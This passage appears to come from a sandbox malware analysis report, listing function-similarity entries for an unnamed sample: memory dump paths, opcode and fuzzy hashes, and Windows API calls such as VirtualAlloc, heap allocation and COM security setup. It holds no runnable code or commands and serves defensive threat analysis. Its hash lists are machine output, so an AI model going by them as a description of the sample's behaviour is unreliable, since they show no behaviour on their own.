                                                                                    • Instruction Fuzzy Hash: E46163B6604300CFC7308FA4D8D2767B3E2FF95318F184A29E9A6473A0E776A908D711
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: @
                                                                                    • API String ID: 2994545307-2766056989
                                                                                    • Opcode ID: 83da35874207cc83fb268d86cfeb5fd833750894af658d6c73d55019768abc28
                                                                                    • Instruction ID: a34e9d1718911820ecf5429943cd2b2e2081d75beb1a7b7cb8a8d51d6d32e10c
                                                                                    • Opcode Fuzzy Hash: 83da35874207cc83fb268d86cfeb5fd833750894af658d6c73d55019768abc28
                                                                                    • Instruction Fuzzy Hash: CF3103B11083049FC314EF18D8C1A6BBBF8FF95318F14892DE59687291D371D908CB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \U^_
                                                                                    • API String ID: 0-352632802
                                                                                    • Opcode ID: a57e4da8dc74178e329435f441bbd8feef5343c2575a7162a8dd6b667ff6eea3
                                                                                    • Instruction ID: 3107ac5d2865bd216723d8addd16ee0487edee05abd24769b7f80544de4a7687
                                                                                    • Opcode Fuzzy Hash: a57e4da8dc74178e329435f441bbd8feef5343c2575a7162a8dd6b667ff6eea3
                                                                                    • Instruction Fuzzy Hash: 1211E27060D3808FD3249F349454AABBBA5EFD7744F544A2CE1C95B241C735980A8F9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac85db6504e41ec8bad30d103b7852c10bcf4da245376245838c0b332f4b41e0
                                                                                    • Instruction ID: 397b2620755852fea43b8d3de79f18a29cd48ef8b4f612baba129a7cc9c100e8
                                                                                    • Opcode Fuzzy Hash: ac85db6504e41ec8bad30d103b7852c10bcf4da245376245838c0b332f4b41e0
                                                                                    • Instruction Fuzzy Hash: 5272D3B5604B408FD724DF38C4C536ABBE1AB95310F0D8A2DD8EB87792E635E549DB02
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e970990a0c87777e8366570045e2eba41aeaf53ea0d51b350b60505bd2eaec2e
                                                                                    • Instruction ID: 27f47fa2fce5c92d0cc3d467f387e954dbd562c07b4afe8d0a2f753bd4b434cd
                                                                                    • Opcode Fuzzy Hash: e970990a0c87777e8366570045e2eba41aeaf53ea0d51b350b60505bd2eaec2e
                                                                                    • Instruction Fuzzy Hash: 537169326043119FC714BE29C850A3FB3A6EFD5754F19C43DE5878B2A5EB309D419786
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 34252a99d980ec0edb3431f343705e922fda850094891fdc5f09511613123157
                                                                                    • Instruction ID: 30b0e77a8785e1c357fefc0d010a35df1ef97fbaf9c4a031675b46fced51b2ef
                                                                                    • Opcode Fuzzy Hash: 34252a99d980ec0edb3431f343705e922fda850094891fdc5f09511613123157
                                                                                    • Instruction Fuzzy Hash: CC614D726082049FD724EB28D891B7FB7A3EBD4308F2D846DD58797355EA319D01CB89
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 00CA9B09
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: ]kh0
                                                                                    • API String ID: 4275171209-3613195681
                                                                                    • Opcode ID: d95e7a9ff2c21f0339c35b0a677677a1b3515c4e84b082f81217b78da0014403
                                                                                    • Instruction ID: b2f65ea9f8971b50b85b0dce2a1d49c8e26e9efc982af6dbf3a89dabfd61a3aa
                                                                                    • Opcode Fuzzy Hash: d95e7a9ff2c21f0339c35b0a677677a1b3515c4e84b082f81217b78da0014403
                                                                                    • Instruction Fuzzy Hash: 33014CB950CB078BD3044F77ACC547D76A4EB55329F24432EF952826C1D9720C019516
                                                                                    APIs
                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,00C5B29B,?,00000001,?,?,?,?,?,?,?), ref: 00C8B452
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: cab0a521dc478c079d9e6cb25022356803b7d9f0bb3f963ac915eab0e8ae42d0
                                                                                    • Instruction ID: c9d362fb8438537839181fc07f87e6af11320fb7c569e1bb67c13da6c312a0fc
                                                                                    • Opcode Fuzzy Hash: cab0a521dc478c079d9e6cb25022356803b7d9f0bb3f963ac915eab0e8ae42d0
                                                                                    • Instruction Fuzzy Hash: 33E0E532504114EBC2107B357C0AB6B7678DFC6B18F0A0421F40192166D731EC00D6AD
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: 390555f007397572d1eb8d9a26e33cebdaeae4731e3ff9de90956992d89c5078
                                                                                    • Instruction ID: b4551a6d20e00d212015702dfa26d600620631d1da83f940351f95b6b05a0ba5
                                                                                    • Opcode Fuzzy Hash: 390555f007397572d1eb8d9a26e33cebdaeae4731e3ff9de90956992d89c5078
                                                                                    • Instruction Fuzzy Hash: F4011475249702CFE310CF64D4D8B4BBBF1AB84304F14891CE4954B385C7B5A9498FC2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: 5b6518b9141979d2d2900c6e8b0f34efe2b613e7388deda3f4e20dc83469704e
                                                                                    • Instruction ID: f268090dbcafc1403c9b5381aae83f3764d51e6eee89ad4527395b8e5808486b
                                                                                    • Opcode Fuzzy Hash: 5b6518b9141979d2d2900c6e8b0f34efe2b613e7388deda3f4e20dc83469704e
                                                                                    • Instruction Fuzzy Hash: 5101F9B5609705CFE305DF28D498B5ABBF1FB89304F10881CE4958B3A1C779A949CF81
                                                                                    APIs
                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 00C5CE04
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 54bda6c2f2c30935502b918c6c166bd57dd8efd4863171dcd58520c235fbb959
                                                                                    • Instruction ID: c302c37298c9d78cdb8a47ad92220efab8ecefb737e9f0df144f1c6403abcd3f
                                                                                    • Opcode Fuzzy Hash: 54bda6c2f2c30935502b918c6c166bd57dd8efd4863171dcd58520c235fbb959
                                                                                    • Instruction Fuzzy Hash: FBD0A7221A0A4837D250A61DDD5FF2B325C8703B78F00162762A2C62C1DC406921D5A5
                                                                                    APIs
                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00C5CE36
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeSecurity
                                                                                    • String ID:
                                                                                    • API String ID: 640775948-0
                                                                                    • Opcode ID: 9c2f50edea4c3a028ac6d698da5ba96cd95c17373d7b2ca3fe416e73d800c234
                                                                                    • Instruction ID: 80658e5694eae8eaa0b32377be94fc8523534cb5c594a89b0494ec83eae36de6
                                                                                    • Opcode Fuzzy Hash: 9c2f50edea4c3a028ac6d698da5ba96cd95c17373d7b2ca3fe416e73d800c234
                                                                                    • Instruction Fuzzy Hash: E3D0C9323D430176F5388A18AC67F1932058302F14F701A1AB362FE6D0CCD07111D518
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,00000000,00C62F5C), ref: 00C89B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 7cfb0e7d488ab9a1825345c763f20c337acbc661a0c4466763c450fb303888e0
                                                                                    • Instruction ID: 357071139aae2aa0e88ba7507b823d3ca459c9187e829965d009f8492e49c46d
                                                                                    • Opcode Fuzzy Hash: 7cfb0e7d488ab9a1825345c763f20c337acbc661a0c4466763c450fb303888e0
                                                                                    • Instruction Fuzzy Hash: 66D0C931545136EBCA506B28BC19BCB3A68DF49631F0B0891B400AA0A4C665EC919AD4
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,?,00C64E57,00000400), ref: 00C89B50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
